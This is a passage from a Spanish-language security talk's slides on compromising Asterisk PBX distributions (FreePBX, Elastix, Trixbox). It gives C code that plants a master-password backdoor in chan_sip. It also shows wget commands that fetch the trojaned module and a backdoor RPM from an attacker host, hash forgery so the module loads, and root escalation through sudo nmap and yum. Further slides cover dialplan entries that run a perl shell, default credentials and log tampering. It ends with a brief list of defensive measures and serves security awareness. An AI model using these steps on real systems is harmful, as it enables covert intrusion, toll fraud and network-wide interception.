  64. 64. Buscamos un directorio con permisos de escritura y copiamos los módulos: sh-4.1$ mkdir /var/lib/asterisk/moh/modules sh-4.1$ cp /usr/lib/asterisk/modules/* /var/lib/asterisk/moh/modules/
  65. 65. Modificamos el fichero asterisk.conf cambiando la ruta de los módulos: sh-4.1$ cd /etc/asterisk sh-4.1$ mv asterisk.conf asterisk.conf.cop sh-4.1$ echo "[directories]">asterisk.conf sh-4.1$ echo "astetcdir => /etc/asterisk">>asterisk.conf sh-4.1$ echo "astmoddir => /var/lib/asterisk/moh/modules">>asterisk.conf sh-4.1$ echo "astvarlibdir => /var/lib/asterisk">>asterisk.conf sh-4.1$ echo "astagidir => /var/lib/asterisk/agi-bin">>asterisk.conf sh-4.1$ echo "astspooldir => /var/spool/asterisk">>asterisk.conf sh-4.1$ echo "astrundir => /var/run/asterisk">>asterisk.conf sh-4.1$ echo "astlogdir => /var/log/asterisk">>asterisk.conf sh-4.1$ echo "[options]">>asterisk.conf sh-4.1$ echo "transmit_silence_during_record = yes">>asterisk.conf sh-4.1$ echo "languageprefix=yes">>asterisk.conf sh-4.1$ echo "execincludes=yes">>asterisk.conf
  66. 66. Reiniciamos el Asterisk ... sh-4.1$ asterisk -rx "core restart when convenient"
  67. 67. Reiniciamos el Asterisk ... sh-4.1$ asterisk -rx "core restart when convenient" Verificamos qué módulos hay en uso ... sh-4.1$ fuser -v /usr/lib/asterisk/modules/res_curl.so sh-4.1$ fuser -v /var/lib/asterisk/moh/modules/res_curl.so USER PID ACCESS COMMAND /var/lib/asterisk/moh/modules/res_curl.so: asterisk 2565 ....m asterisk
  68. 68. Y digo yo …
  69. 69. Y digo yo … Si Asterisk es de código abierto y somos capaces de cambiar un módulo en la FreePBX ...
  70. 70. Y digo yo … Si Asterisk es de código abierto y somos capaces de cambiar un módulo en la FreePBX ... ¿Qué tal si modificamos chan_sip.c (encargado de validar los peers) y creamos una contraseña maestra, por código, que valide a cualquier usuario, y luego sustituimos nuestro chan_sip.so por el original?
  71. 71. Función de chan_sip.c que valida el registro de los peers: /*! brief Check user authorization from peer definition Some actions, like REGISTER and INVITEs from peers require authentication (if peer have secret set) return 0 on success, non-zero on error */ static enum check_auth_result check_auth(struct sip_pvt *p, struct sip_request *req, const char *username, const char *secret, const char *md5secret, int sipmethod, const char *uri, enum xmittype reliable, int ignore) { …....... }
  72. 72. Validación del peer: if (!ast_strlen_zero(md5secret)) { ast_copy_string(a1_hash, md5secret, sizeof(a1_hash)); } else { char a1[256]; snprintf(a1, sizeof(a1), "%s:%s:%s", username, p->realm, secret); ast_md5_hash(a1_hash, a1); } /* compute the expected response to compare with what we received */ { char a2[256]; char a2_hash[256]; char resp[256]; snprintf(a2, sizeof(a2), "%s:%s", sip_methods[sipmethod].text, S_OR(keys[K_URI].s, uri)); ast_md5_hash(a2_hash, a2); snprintf(resp, sizeof(resp), "%s:%s:%s", a1_hash, usednonce, a2_hash); ast_md5_hash(resp_hash, resp); } good_response = keys[K_RESP].s && !strncasecmp(keys[K_RESP].s, resp_hash, strlen(resp_hash));
  73. 73. Añadiendo estas pocas líneas permitiremos que cualquier usuario valide con la contraseña 31337: if (good_response == 0) { char a1[256], char a2[256]; char a2_hash[256]; char resp[256]; strcpy(secret, "31337"); snprintf(a1, sizeof(a1), "%s:%s:%s", username, p->realm, secret); ast_md5_hash(a1_hash, a1); snprintf(a2, sizeof(a2), "%s:%s", sip_methods[sipmethod].text, S_OR(keys[K_URI].s, uri)); ast_md5_hash(a2_hash, a2); snprintf(resp, sizeof(resp), "%s:%s:%s", a1_hash, usednonce, a2_hash); ast_md5_hash(resp_hash, resp); good_response = keys[K_RESP].s && !strncasecmp(keys[K_RESP].s, resp_hash, strlen(resp_hash)); }
  74. 74. Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX: sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so
  75. 75. Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX: sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so"
  76. 76. Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX: sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so" Unable to load module chan_sip.so Command 'module load chan_sip.so' failed.
  77. 77. Compilamos en nuestra máquina el módulo y lo subimos al servidor de FreePBX: sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so" Unable to load module chan_sip.so Command 'module load chan_sip.so' failed. Asterisk no nos permite meter un módulo de otra compilación!!
  78. 78. Pero …
  79. 79. Pero … Y si nos descargamos el chan_sip.so original a nuestra máquina ... sh-4.1$ cp /usr/lib/asterisk/modules/chan_sip.so /var/www/html/ pepelux@debian$ wget http://192.168.2.20/chan_sip.so Y lo comparamos con la copia usando el comando strings: pepelux@debian$ strings chan_sip_orig.so __gmon_start__ __cxa_finalize _Jv_RegisterClasses ast_str_append …....... _ast_calloc 95089850e3c922fa176f9bd274fd8109 ← Huella del fichero original
  80. 80. pepelux@debian$ strings chan_sip_cop.so __gmon_start__ __cxa_finalize _Jv_RegisterClasses ast_str_append …....... ;*2$" 47bd3e0f3e5a335edebd1441b5beb3af ← Huella del fichero modificado
  81. 81. pepelux@debian$ strings chan_sip_cop.so __gmon_start__ __cxa_finalize _Jv_RegisterClasses ast_str_append …....... ;*2$" 47bd3e0f3e5a335edebd1441b5beb3af ← Huella del fichero modificado Con un editor hexadecimal le ponemos al nuevo fichero la huella del original.
  82. 82. Repetimos el proceso … sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so
  83. 83. Repetimos el proceso … sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so"
  84. 84. Repetimos el proceso … sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so" Loaded module chan_sip.so
  85. 85. Repetimos el proceso … sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so" Loaded module chan_sip.so Hemos troyanizado el Asterisk!!
  86. 86. Repetimos el proceso … sh-4.1$ cd /var/lib/asterisk/moh/modules/ sh-4.1$ rm chan_sip.so sh-4.1$ wget http://192.168.2.9:/freepbx/chan_sip.so Recargamos el módulo ... sh-4.1$ asterisk -rx "module unload chan_sip.so" sh-4.1$ asterisk -rx "module load chan_sip.so" Loaded module chan_sip.so Hemos troyanizado el Asterisk!!
  87. 87. ¡¡ Veamos un caso práctico !! DEMO Con la última versión de FreePBX: 2.11.0 (Stable-4.211.64-7) del 20/09/2013
  88. 88. El problema es que con todo esto, habremos dejado muchos logs ...
  89. 89. El problema es que con todo esto, habremos dejado muchos logs ... No pasa nada, los logs también son propiedad del usuario asterisk! sh-4.1$ ls -la /var/log/asterisk -la
  90. 90. El problema es que con todo esto, habremos dejado muchos logs ... No pasa nada, los logs también son propiedad del usuario asterisk! sh-4.1$ ls -la /var/log/asterisk -la
  91. 91. Además de todo esto, si la versión de FreePBX es <= 2.10.0 … sh-4.1$ cat /etc/sudoers asterisk ALL = NOPASSWD: /sbin/shutdown asterisk ALL = NOPASSWD: /usr/bin/nmap asterisk ALL = NOPASSWD: /usr/bin/yum asterisk ALL = NOPASSWD: /bin/touch asterisk ALL = NOPASSWD: /bin/chmod asterisk ALL = NOPASSWD: /bin/chown asterisk ALL = NOPASSWD: /sbin/service asterisk ALL = NOPASSWD: /sbin/init asterisk ALL = NOPASSWD: /usr/sbin/postmap asterisk ALL = NOPASSWD: /usr/sbin/postfix asterisk ALL = NOPASSWD: /usr/sbin/saslpasswd2 uucp ALL = NOPASSWD: /bin/chmod asterisk ALL = NOPASSWD: /usr/sbin/hardware_detector asterisk ALL = NOPASSWD: /sbin/chkconfig
  92. 92. ¡ Podemos rootear la máquina ! sh-4.1$ sudo nmap --interactive Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h for help nmap> !sh id uid=0(root) gid=0(root) groups=0(root)
  93. 93. Otros sistemas La web es mucho más estricta y no podemos inyectar el script desde el CLI
  94. 94. Otros sistemas La web es mucho más estricta y no podemos inyectar el script desde el CLI Pero trae un editor de ficheros que nos permite crear un nuevo fichero con la shell: Creamos a mano el plan de llamadas en extensions.conf (o desde el CLI): dialplan reload dialplan add extension 999,1,answer, into from-internal dialplan add extension 999,2,system,/usr/bin/perl</etc/asterisk/shell.conf into from-internal dialplan add extension 999,3,hangup, into from-internal
  95. 95. Otros sistemas Durante la instalación nos obliga a poner una contraseña al usuario root de mysql.
  96. 96. Otros sistemas Durante la instalación nos obliga a poner una contraseña al usuario root de mysql. Pero: bash-3.2$ cat /etc/elastix.conf mysqlrootpwd=asterisk01 ← Contraseña de root para mysql cyrususerpwd=asterisk01 ← Contraseña de IMAPd amiadminpwd=web01 ← Contraseña del administrador de la web
  97. 97. Otros sistemas Una vez dentro, lo mismo que antes. bash-3.2$ id uid=100(asterisk) gid=101(asterisk) La web es propiedad del usuario asterisk. Los ficheros de configuración de Asterisk son también propiedad del usuario asterisk, y el proceso para cambiar un módulo es el mismo. Una vez tenemos acceso al sistema, la configuración es prácticamente la misma que en una FreePBX.
  98. 98. Otros sistemas En versiones de Elastix superiores a la 2.2.0 se ha corregido el “problema” del fichero sudoers ...
  99. 99. Otros sistemas En versiones de Elastix superiores a la 2.2.0 se ha corregido el “problema” del fichero sudoers … pero olvidaron quitar los permisos para el comando yum (hasta la versión 2.4.0) bash-3.2$ cat /etc/sudoers asterisk ALL = NOPASSWD: /sbin/shutdown asterisk ALL = NOPASSWD: /usr/bin/yum ... Por lo que si tenemos acceso por consola … ¡ podemos rootear la máquina ! bash-3.2$ wget http://x.x.x.x/backdoor.rpm bash-3.2$ sudo yum localinstall backdoor.rpm
  100. 100. Otros sistemas La web no trae interfaz de comandos (CLI)
  101. 101. Otros sistemas La web no trae interfaz de comandos (CLI) Pero trae un editor de ficheros que nos permite modificar ficheros de configuración: Creamos a mano el plan de llamadas en extensions.conf: [from-internal] exten => 999,1,answer() exten => 999,2,system(/usr/bin/perl</etc/asterisk/sip_custom.conf) exten => 999,3,hangup()
  102. 102. Otros sistemas Una vez dentro, lo mismo que antes. bash-3.2$ id uid=100(asterisk) gid=101(asterisk) bash-3.2$ grep AMPDB /etc/amportal.conf AMPDBNAME=asterisk ← BBDD de Asterisk AMPDBUSER=asteriskuser ← Usuario para mysql AMPDBPASS=amp109 ← Contraseña para mysql La web y el Asterisk, también son propiedad del usuario asterisk, al igual que en las otras distribuciones.
  103. 103. Otros sistemas En Trixbox siguen estando nmap y yum permitidos en el fichero sudoers …. bash-3.2$ cat /etc/sudoers asterisk ALL = NOPASSWD: /sbin/shutdown asterisk ALL = NOPASSWD: /usr/bin/nmap asterisk ALL = NOPASSWD: /usr/bin/yum asterisk ALL = NOPASSWD: /bin/chown asterisk ALL = NOPASSWD: /bin/chmod …....... Por lo que si tenemos acceso por consola … ¡ podemos rootear la máquina !
  104. 104. Consecuencias ¿ Y qué pasa si alguien entra en el sistema y hace alguna llamada ? No puede ser tan grave …
  105. 105. Consecuencias ¿ Y qué pasa si alguien entra en el sistema y hace alguna llamada ? No puede ser tan grave … ¿ o sí ?
  106. 106. Consecuencias Además, una vez accedida a la consola, mediante técnicas de “Man in The Middle” (MiTM) podemos: Monitorizar todo el tráfico de la red: ● Obtención de contraseñas (correo, bancos, redes sociales, etc). ● A pesar de acceder a páginas seguras (HTTPS) → uso de SSLStrip. ● Realizar ataques de “phishing”: ● Suplantación de nombres de dominio y redirección a páginas clonadas. ● Inyección de “malware”: ● Instalación de código JS que permita apoderarnos de los diferentes PCs. ● Troyanización de equipos. ●
  107. 107. Soluciones Si vamos a usar este tipo de plataformas, debemos tomar unas ciertas medidas de seguridad: - Restringir el acceso a la web únicamente desde la red local. - Bloquear todos los accesos procedentes de Internet que no sean estrictamente necesarios. - Proteger la web privada con usuario y contraseña mediante un htaccess. - Evitar el uso de puntos de acceso inalámbricos que puedan poner en peligro nuestra red. - Configurar correctamente los servicios de Asterisk (configuraciones, contextos, ...). - Mantener el sistema siempre actualizado. - Estar al día con los fallos de seguridad que van apareciendo.
  108. 108. ¡ Gracias ! Jose Luis Verdeguer @pepeluxx verdeguer@zoonsuite.com http://blog.pepelux.org http://www.zoonsuite.es http://www.linkedin.com/in/pepelux ¿ Preguntas ?

×